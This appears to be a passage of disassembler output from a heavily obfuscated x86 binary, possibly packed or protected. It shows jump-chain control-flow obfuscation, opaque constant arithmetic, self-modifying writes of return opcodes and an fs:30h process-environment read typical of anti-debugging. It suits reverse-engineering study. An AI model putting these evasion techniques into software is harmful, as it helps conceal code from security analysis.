; START OF FUNCTION CHUNK FOR sub_448CDC
loc_44EE23: ; CODE XREF: sub_448CDC-ADBFj
jmp loc_459431
; END OF FUNCTION CHUNK FOR sub_448CDC
; ---------------------------------------------------------------------------
loc_44EE28: ; CODE XREF: ut7h7i2x:loc_458DBBj
call sub_4529ED
loc_44EE2D: ; CODE XREF: ut7h7i2x:loc_457B21j
jmp loc_457D7B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_44EE32: ; CODE XREF: sub_448321-6ACAj
jmp loc_43B47E
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_44EE38: ; CODE XREF: sub_439BD1+1F04j
jmp loc_44F1C5
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_44EE3D: ; CODE XREF: sub_43EF73-4D78j
jmp loc_44C351
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
dw 0D144h
dword_44EE44 dd 9BA8B41Fh ; DATA XREF: sub_440944+4r
; sub_444AA3:loc_4416EAr ...
; ---------------------------------------------------------------------------
loc_44EE48: ; CODE XREF: ut7h7i2x:00453701j
jmp loc_43D33F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_44EE4D: ; CODE XREF: sub_444A12+85FAj
jmp loc_44C45E
; END OF FUNCTION CHUNK FOR sub_444A12
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E617
loc_44EE52: ; CODE XREF: sub_43E617+12j
jmp nullsub_56
; END OF FUNCTION CHUNK FOR sub_43E617
; =============== S U B R O U T I N E =======================================
sub_44EE57 proc near ; CODE XREF: sub_4044D2:loc_4043FFp
; DATA XREF: fabskl8p:off_41D1A4o
; FUNCTION CHUNK AT 00449CB8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004527C2 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004589C1 SIZE 00000005 BYTES
jb loc_449CB8
mov eax, ds:dword_4462AC
call sub_45742F
loc_44EE68: ; CODE XREF: sub_44CB82+1Ej
jmp loc_4527C2
sub_44EE57 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44339F
loc_44EE6D: ; CODE XREF: sub_44339F-4B8Dj
jmp sub_44600A
; END OF FUNCTION CHUNK FOR sub_44339F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_44EE72: ; CODE XREF: sub_43F7A5:loc_44746Dj
mov [esi], ecx
jb loc_448E33
jmp loc_45573E
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
xchg edx, edi
jmp sub_447DDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_44EE86: ; CODE XREF: sub_44EC11+10D2j
cdq
push 0CE25BD7Fh
loc_44EE8C: ; CODE XREF: sub_440493:loc_452680j
push edi
loc_44EE8D: ; CODE XREF: ut7h7i2x:loc_4502EAj
push 4FCE32F7h
pop edi
add edi, 0D249D2BBh
xor edi, 0AF28D564h
add edi, 731300F6h
jmp loc_440DBD
; END OF FUNCTION CHUNK FOR sub_44EC11
; =============== S U B R O U T I N E =======================================
sub_44EEAA proc near ; CODE XREF: ut7h7i2x:00452200j
; sub_44FC60+855Ep
xchg ebx, [esp+0]
pop ebx
mov esp, ebp
pop ebp
retn
sub_44EEAA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44EEB2 proc near ; CODE XREF: sub_440A88+4p
; sub_450EBD+4p
; FUNCTION CHUNK AT 004530A3 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_4530A3
sub_44EEB2 endp
; ---------------------------------------------------------------------------
push esi
mov esi, eax
call sub_44AAA2
; START OF FUNCTION CHUNK FOR sub_456B6D
loc_44EEC2: ; CODE XREF: sub_456B6D-C295j
jmp loc_43E73C
; END OF FUNCTION CHUNK FOR sub_456B6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458B53
loc_44EEC7: ; CODE XREF: sub_458B53:loc_43E392j
sub edx, 34E0014Dh
add edx, 7E310FB2h
xchg edx, [esp+8+var_8]
jmp sub_4417AF
; END OF FUNCTION CHUNK FOR sub_458B53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_44EEDB: ; CODE XREF: sub_446CA0-3356j
pushf
loc_44EEDC: ; CODE XREF: sub_446CA0:loc_452CAAj
push edi
push 50E2F543h
call sub_44DD56
; END OF FUNCTION CHUNK FOR sub_446CA0
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_44EEE7: ; CODE XREF: sub_4396F5+3AF2j
adc ebx, 0F5532F73h
jmp loc_45300C
; END OF FUNCTION CHUNK FOR sub_4396F5
; ---------------------------------------------------------------------------
loc_44EEF2: ; DATA XREF: sub_447CBE:loc_44D5EEo
pop edx
mov edx, [esp]
push ebp
mov ebp, eax
jmp loc_455255
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4593D3
loc_44EEFE: ; CODE XREF: sub_4593D3+Cj
mov eax, edx
pop edx
xor eax, 0FD2664C2h
cmp eax, 0C2CE1BF5h
jmp loc_453E0F
; END OF FUNCTION CHUNK FOR sub_4593D3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_290. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CC1E
loc_44EF13: ; CODE XREF: sub_44CC1E-431Bj
; ut7h7i2x:0045AC47j
jmp loc_43EE00
; END OF FUNCTION CHUNK FOR sub_44CC1E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451971
loc_44EF18: ; CODE XREF: sub_451971-79F0j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_451971
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44EF1D: ; CODE XREF: sub_43AB62:loc_449126j
jnp loc_44D3CB
loc_44EF23: ; CODE XREF: sub_4464FE:loc_43BC91j
sub eax, 2C55C6F9h
cmp eax, 0FEF38F4Ah
jmp loc_45433B
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_44EF34: ; CODE XREF: sub_4565B2:loc_442AA9j
jnz loc_453C82
jmp loc_449633
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
loc_44EF3F: ; CODE XREF: ut7h7i2x:004482A3j
add eax, 0B2ECB3DDh
xchg eax, [esp]
jmp loc_440396
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ED59
loc_44EF4D: ; CODE XREF: sub_43ED59+1A4ECj
xchg ecx, [esp+4+var_4]
jmp loc_45078F
; END OF FUNCTION CHUNK FOR sub_43ED59
; ---------------------------------------------------------------------------
loc_44EF55: ; CODE XREF: ut7h7i2x:00459BEBj
call sub_442096
; START OF FUNCTION CHUNK FOR sub_45A8EC
loc_44EF5A: ; CODE XREF: sub_45A8EC-BF31j
jmp sub_44C273
; END OF FUNCTION CHUNK FOR sub_45A8EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B4F
loc_44EF5F: ; CODE XREF: sub_452B4F:loc_44F2BFj
jnz sub_450231
add esp, 0FFFFFFF0h
push offset loc_44C65E
jmp loc_4464D4
; END OF FUNCTION CHUNK FOR sub_452B4F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_44EF72: ; CODE XREF: sub_444374+10387j
not ebp
add eax, 0DFD24DB4h
adc ecx, eax
sub ebp, 548CD74Fh
jmp loc_458455
; END OF FUNCTION CHUNK FOR sub_444374
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_44EF87: ; CODE XREF: sub_44EB88-D54Cj
rol ebx, 12h
cmp ebx, 931DC92h
jmp loc_43E3AA
; END OF FUNCTION CHUNK FOR sub_44EB88
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_279. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44EF96: ; CODE XREF: sub_43AB62:loc_44D772j
jnz loc_459ACA
sub edx, esi
cdq
popf
jmp loc_44E083
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_44EFA5: ; DATA XREF: sub_453936+4o
call sub_44A833
mov eax, 0CB39536Bh
push ebx
call sub_45137D
loc_44EFB5: ; CODE XREF: ut7h7i2x:0044DECDj
jmp loc_451A9A
; ---------------------------------------------------------------------------
loc_44EFBA: ; CODE XREF: ut7h7i2x:00458194j
and eax, 1FFA1DA0h
add eax, 173C2495h
; =============== S U B R O U T I N E =======================================
sub_44EFC6 proc near ; CODE XREF: sub_43EF73:loc_4577C2j
push ebx
push offset loc_451714
jmp nullsub_302
sub_44EFC6 endp
; =============== S U B R O U T I N E =======================================
sub_44EFD1 proc near ; DATA XREF: sub_44BDF1:loc_459320o
; FUNCTION CHUNK AT 0043D62C SIZE 00000005 BYTES
mov eax, [ebp-4]
push offset loc_4427FB
jmp loc_43D62C
sub_44EFD1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4464B7
loc_44EFDE: ; CODE XREF: sub_4464B7:loc_457EB6j
jp loc_448787
jmp loc_43DBDB
; END OF FUNCTION CHUNK FOR sub_4464B7
; ---------------------------------------------------------------------------
loc_44EFE9: ; CODE XREF: ut7h7i2x:loc_44FC80j
jge loc_44489B
; START OF FUNCTION CHUNK FOR sub_440E5F
loc_44EFEF: ; CODE XREF: sub_440E5F+12E09j
jmp loc_44B798
; END OF FUNCTION CHUNK FOR sub_440E5F
; ---------------------------------------------------------------------------
jnp sub_45A32D
jmp loc_444898
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_155. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_44F000 proc near ; CODE XREF: ut7h7i2x:loc_43B3A1p
; ut7h7i2x:0044ABB8j
; FUNCTION CHUNK AT 00448B26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FA2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004532C7 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004599AC SIZE 00000025 BYTES
xchg edi, [esp+0]
pop edi
push 0D8C68412h
pop esi
add esi, 9D359656h
jmp loc_44FA2C
sub_44F000 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE1A
loc_44F015: ; CODE XREF: sub_43AE1A:loc_4423A9j
pop esi
add esi, 36BBDB5Dh
or esi, 27203374h
add esi, 985F363Dh
xchg esi, [esp-0Ch+arg_8]
jmp sub_455807
; END OF FUNCTION CHUNK FOR sub_43AE1A
; ---------------------------------------------------------------------------
loc_44F030: ; DATA XREF: sub_4414E8+Fo
call nullsub_426
xchg edi, [esp]
mov ecx, edi
pop edi
jmp loc_439C70
; =============== S U B R O U T I N E =======================================
sub_44F040 proc near ; CODE XREF: ut7h7i2x:0044BF43j
; sub_454596+4954p
; FUNCTION CHUNK AT 0043D7CB SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004468F4 SIZE 00000010 BYTES
xchg ebx, [esp+0]
pop ebx
push edx
loc_44F045: ; CODE XREF: sub_445048:loc_43B367j
mov edx, eax
xchg edx, [esp+0]
push ecx
mov ecx, eax
call sub_4503AC
loc_44F052: ; CODE XREF: sub_44D1F0:loc_44B185j
jmp loc_4468F4
sub_44F040 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_375. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_44F058: ; CODE XREF: sub_44602A+CED4j
jmp loc_43DA12
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45500F
loc_44F05D: ; CODE XREF: sub_45500F-5B2Bj
jmp loc_43BF2A
; END OF FUNCTION CHUNK FOR sub_45500F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F071
loc_44F062: ; CODE XREF: sub_43F071+11j
jmp loc_4506AF
; END OF FUNCTION CHUNK FOR sub_43F071
; ---------------------------------------------------------------------------
loc_44F067: ; CODE XREF: ut7h7i2x:00450BF7j
mov ebx, [ecx]
; =============== S U B R O U T I N E =======================================
sub_44F069 proc near ; CODE XREF: sub_458E89+Ap
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044CD13 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
xchg ebx, [esp-4+arg_0]
jmp loc_44CD13
sub_44F069 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_44F075: ; CODE XREF: sub_45601B:loc_454D88j
shl edx, 11h
jmp loc_45A748
; END OF FUNCTION CHUNK FOR sub_45601B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_44F07D: ; CODE XREF: sub_439D5C:loc_44F0B2j
lea eax, loc_43F000
mov byte ptr [eax], 0C3h
jmp loc_43F000
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_44F08B: ; CODE XREF: sub_44CE09:loc_43F000j
pop edx
mov eax, [esp+0]
jmp loc_44532D
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DE22
loc_44F094: ; CODE XREF: sub_43DE22:loc_4411CCj
; ut7h7i2x:004411E9j
xor ebx, 13B6B747h
and ebx, 592A3909h
xor ebx, 0DC3D92D5h
cmp ebx, 0DAB78D67h
jmp loc_45A1A2
; END OF FUNCTION CHUNK FOR sub_43DE22
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_342. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_44F0B2: ; CODE XREF: sub_439D5C+91DCj
jmp loc_44F07D
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_44F0B7: ; CODE XREF: sub_4524FE+85F1j
jnz loc_44BD70
mov eax, 6
sub eax, [ebp-0Ch]
mov [ebp-0Ch], eax
; END OF FUNCTION CHUNK FOR sub_4524FE
; START OF FUNCTION CHUNK FOR sub_450645
loc_44F0C8: ; CODE XREF: sub_45AAD1:loc_44A3E5j
; sub_45AAD1-ED5Dj ...
call sub_43BDD6
loc_44F0CD: ; CODE XREF: ut7h7i2x:0044C3C9j
jmp loc_4537F3
; END OF FUNCTION CHUNK FOR sub_450645
; ---------------------------------------------------------------------------
loc_44F0D2: ; CODE XREF: ut7h7i2x:0043D2D6j
shl ebx, 1Ch
ror ecx, 3
loc_44F0D8: ; CODE XREF: ut7h7i2x:loc_43D2C4j
; ut7h7i2x:loc_455B3Ej
add ecx, 48CD234Eh
add ecx, ebp
add ecx, 0DED06861h
mov ecx, [ecx]
popf
add eax, ecx
jmp loc_457EA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_44F0F0: ; CODE XREF: sub_450231+40A2j
rol ebp, 0Eh
not ebx
loc_44F0F5: ; CODE XREF: sub_450231:loc_452F60j
mov eax, [ebp-4]
mov eax, [eax]
and eax, 0FFFFFFh
cmp eax, 0C3C033h
jnz loc_451CB7
jmp loc_451FC5
; END OF FUNCTION CHUNK FOR sub_450231
; =============== S U B R O U T I N E =======================================
sub_44F10F proc near ; CODE XREF: sub_4549F0-4364p
; ut7h7i2x:00452B75j
xchg edi, [esp+0]
pop edi
add eax, 80155ECEh
mov eax, [eax]
push offset sub_4529E0
jmp nullsub_114
sub_44F10F endp
; ---------------------------------------------------------------------------
loc_44F125: ; CODE XREF: ut7h7i2x:00441B5Fj
adc edi, 6246B158h
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_44F12B: ; CODE XREF: sub_4489DF+FDC1j
add ecx, 5258211h
and ecx, 5BF69632h
rol ecx, 0Fh
add ecx, 39A698h
mov [ecx], eax
jmp loc_459102
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44F147: ; CODE XREF: sub_457A66:loc_43D5B4j
sbb ebx, 0B4514CD5h
cmp ecx, 0B614839h
jmp loc_44DA6B
; END OF FUNCTION CHUNK FOR sub_457A66
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_213. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44F159: ; CODE XREF: ut7h7i2x:00443194j
jmp nullsub_113
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_44F15E: ; CODE XREF: sub_4508DB-113A3j
jmp loc_45780B
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456DB3
loc_44F163: ; CODE XREF: sub_456DB3-6F0Bj
mov [edx], ebp
or ecx, 10A5F5D8h
cdq
pushf
loc_44F16D: ; CODE XREF: sub_456DB3:loc_44FEA0j
and edi, 6C3BBBE2h
cmp edi, 0F0134618h
loc_44F179: ; CODE XREF: sub_44865D:loc_45ADC8j
jmp loc_447338
; END OF FUNCTION CHUNK FOR sub_456DB3
; =============== S U B R O U T I N E =======================================
sub_44F17E proc near ; CODE XREF: ut7h7i2x:0043DEA9p
; ut7h7i2x:00449D7Cj
xchg ecx, [esp+0]
pop ecx
lea eax, nullsub_15
mov byte ptr [eax], 0C3h
jmp nullsub_15
sub_44F17E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44F190: ; CODE XREF: ut7h7i2x:00451D11j
pop edx
jmp loc_4537B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_44F196: ; CODE XREF: sub_446258-D21Fj
cmp dword ptr [eax], 47424454h
jnz loc_4484F2
jmp loc_45AA8C
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
loc_44F1A7: ; CODE XREF: ut7h7i2x:loc_4396C5j
pop ebp
xchg ebp, [esp]
call sub_44B5CF
mov eax, 24CC2B1h
call sub_43AA94
mov ds:dword_41D194, eax
jmp loc_44342C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_44F1C5: ; CODE XREF: sub_439BD1:loc_44EE38j
xchg edx, [esp+4+var_4]
push 400000h
jmp loc_4582BE
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_44F1D2: ; CODE XREF: ut7h7i2x:00445D7Dj
or [ecx+edx], al
mov eax, [ebp-0Ch]
jmp loc_45881D
; ---------------------------------------------------------------------------
loc_44F1DD: ; CODE XREF: ut7h7i2x:0044C318j
; ut7h7i2x:loc_459721j
push edi
mov edi, eax
xchg edi, [esp]
push 9654120Bh
jmp loc_43A5FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_44F1ED: ; CODE XREF: ut7h7i2x:00446574j
; sub_4462B0:loc_453BAAj
xor eax, 4101E411h
add eax, ebp
add eax, 0C6E010B0h
push eax
push ebp
mov ebp, edi
xchg ebp, [esp+0]
push 0C0602DD4h
jmp loc_450810
; END OF FUNCTION CHUNK FOR sub_4462B0
; =============== S U B R O U T I N E =======================================
sub_44F20C proc near ; DATA XREF: ut7h7i2x:0043CDECo
; FUNCTION CHUNK AT 0044E5D7 SIZE 00000005 BYTES
lea eax, sub_4450F6
mov byte ptr [eax], 0C3h
jmp loc_44E5D7
sub_44F20C endp
; =============== S U B R O U T I N E =======================================
sub_44F21A proc near ; CODE XREF: sub_41946E+4Ap
; sub_44F21A+5j
; DATA XREF: ...
call sub_44F22A
jmp ds:off_41D208
sub_44F21A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_44F225: ; CODE XREF: sub_449D3B+107C8j
jmp loc_43DDE4
; END OF FUNCTION CHUNK FOR sub_449D3B
; =============== S U B R O U T I N E =======================================
sub_44F22A proc near ; CODE XREF: sub_452C5A:loc_445C0Dj
; sub_44F21Ap ...
; FUNCTION CHUNK AT 0043D8A2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045041D SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0045A100 SIZE 00000005 BYTES
pop edx
jmp loc_45A100
sub_44F22A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44F230: ; CODE XREF: ut7h7i2x:0044FB4Bj
jg loc_450F3A
xor esi, 0DD200024h
loc_44F23C: ; CODE XREF: ut7h7i2x:loc_43CCBDj
mov eax, [edi]
; START OF FUNCTION CHUNK FOR sub_457818
loc_44F23E: ; CODE XREF: sub_457818:loc_44FB32j
add edi, 2A8666D6h
rol edi, 1Fh
add edi, 491AD7Dh
popf
xchg edi, [esp+0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_457818
; =============== S U B R O U T I N E =======================================
sub_44F256 proc near ; CODE XREF: ut7h7i2x:004467A9j
; sub_451284:loc_44C390p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439C72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A52C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043B098 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447A99 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044A6ED SIZE 00000005 BYTES
xchg eax, [esp+4+var_4]
pop eax
xor eax, 182B2A54h
ror eax, 1Dh
xor eax, 0B9154B32h
mov edx, [esp+0]
push eax
mov eax, edx
jmp loc_439C72
sub_44F256 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xor edi, 18BFE9F3h
jmp sub_43E592
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453D8B
loc_44F27F: ; CODE XREF: sub_453D8B:loc_43B093j
rol edi, 3
cmp edi, 0E6C3BBFCh
jmp loc_453E57
; END OF FUNCTION CHUNK FOR sub_453D8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44F28D: ; CODE XREF: sub_43AB62:loc_45911Bj
sub ebp, edx
cdq
mov [ecx], ebp
jmp loc_44690F
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44F297: ; CODE XREF: sub_439BF8:loc_44AC00j
sbb ecx, 949672Dh
xor ebx, ebp
jnz loc_44D522
jmp loc_443EFF
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_44F2AA: ; CODE XREF: ut7h7i2x:00446B58j
add edx, 864973A9h
popf
xchg edx, [esp]
jmp loc_442863
; ---------------------------------------------------------------------------
jmp ds:dword_41D060
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B4F
loc_44F2BF: ; CODE XREF: sub_452B4F+3j
jmp loc_44EF5F
; END OF FUNCTION CHUNK FOR sub_452B4F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_44F2C4: ; CODE XREF: sub_444A12+51FCj
jmp nullsub_268
; END OF FUNCTION CHUNK FOR sub_444A12
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_16. PRESS KEYPAD "+" TO EXPAND]
dw 4745h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_44F2CE: ; CODE XREF: ut7h7i2x:00444AF8j
jmp nullsub_216
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_44F2D3: ; CODE XREF: sub_44F43B:loc_444C9Fj
; sub_44F43B-7EE6j
call sub_44C068
push 44824A38h
xchg eax, [esp+0]
mov edx, eax
pop eax
add edx, 0AF72C7ADh
xor edx, 53E0EEADh
add edx, 0E393C01Fh
jmp loc_457B07
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
dw 8A0Fh
dd 0FFFFC502h
; =============== S U B R O U T I N E =======================================
sub_44F300 proc near ; CODE XREF: ut7h7i2x:loc_448377j
; sub_44D1F0+7124p
; FUNCTION CHUNK AT 00448610 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00448A3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C3EC SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044CA10 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045110C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045683F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00459C07 SIZE 00000014 BYTES
xchg edx, [esp+0]
pop edx
add eax, ebp
push esi
push 0B0BE8006h
pop esi
jmp loc_448610
sub_44F300 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_225. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C9F5
loc_44F313: ; CODE XREF: sub_43C9F5+EF5j
jmp nullsub_297
; END OF FUNCTION CHUNK FOR sub_43C9F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_44F318: ; CODE XREF: sub_44445F+1027Aj
jb loc_44A052
mov esi, 0F12EE948h
jl loc_440882
xchg esi, ecx
jmp loc_449674
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
locret_44F330: ; CODE XREF: ut7h7i2x:0044214Cj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_44F331: ; CODE XREF: sub_43AED9-181Aj
jmp loc_4573E2
; END OF FUNCTION CHUNK FOR sub_43AED9
; =============== S U B R O U T I N E =======================================
sub_44F336 proc near ; DATA XREF: sub_452361+497o
push eax
call sub_445048
sub_44F336 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_44F33C: ; CODE XREF: ut7h7i2x:0044CC5Aj
; sub_439D5C:loc_450DBCj
jz loc_44EE14
call sub_446151
mov eax, large fs:30h
add eax, 0D268C98Bh
call sub_4573BA
loc_44F359: ; CODE XREF: ut7h7i2x:004511ECj
jmp loc_457C8E
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4580B3
loc_44F35E: ; CODE XREF: sub_4580B3+2C24j
jb loc_43F3F8
shr ebp, 13h
loc_44F367: ; CODE XREF: sub_4580B3:loc_45093Ej
call sub_45500F
push offset loc_4405D9
jmp nullsub_319
; END OF FUNCTION CHUNK FOR sub_4580B3
; ---------------------------------------------------------------------------
loc_44F376: ; DATA XREF: sub_457F14+Do
mov eax, [eax]
test eax, 1
jz loc_458413
jmp loc_439F00
; ---------------------------------------------------------------------------
loc_44F388: ; DATA XREF: sub_449D3B:loc_449694o
push 0E23AE6DEh
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_44F38D: ; CODE XREF: sub_43FCEE+40F7j
pop eax
rol eax, 19h
add eax, 0A3FD6DA1h
sub eax, 0B0DA69F2h
xor eax, 1916361Dh
add eax, ebp
add eax, 560EB09Bh
jmp loc_44E7B5
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
loc_44F3B0: ; CODE XREF: ut7h7i2x:loc_444545j
jz loc_440B17
jmp loc_44964D
; ---------------------------------------------------------------------------
mov ds:off_41D174, eax
lea eax, sub_454A2B
mov byte ptr [eax], 0C3h
jmp loc_44998D
; =============== S U B R O U T I N E =======================================
sub_44F3CF proc near ; DATA XREF: .data:off_42796Co
; FUNCTION CHUNK AT 004429BD SIZE 00000006 BYTES
call nullsub_8
jmp loc_4429BD
sub_44F3CF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456F1D
loc_44F3D9: ; CODE XREF: sub_456F1D:loc_452B09j
pop esi
lea eax, sub_448321
mov byte ptr [eax], 0C3h
jmp sub_448321
; END OF FUNCTION CHUNK FOR sub_456F1D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_44F3E8: ; CODE XREF: sub_448321:loc_44DA9Fj
mov eax, [esp+4+var_4]
push edx
nop
mov eax, 2867838Ah
jmp loc_44306E
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
xor esi, 942B88B7h
test edx, ecx
jmp loc_45204C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D43D
loc_44F404: ; CODE XREF: sub_44D43D-8245j
push 0A08032Ch
pop esi
and esi, ds:4000F6h
add esi, 0F14963B0h
and esi, 94834F2Dh
jmp loc_443240
; END OF FUNCTION CHUNK FOR sub_44D43D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_44F421: ; CODE XREF: sub_44B45E+86ADj
shl ebx, 2
loc_44F424: ; CODE XREF: sub_44B45E:loc_45A508j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_43DE5B
jmp loc_458943
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
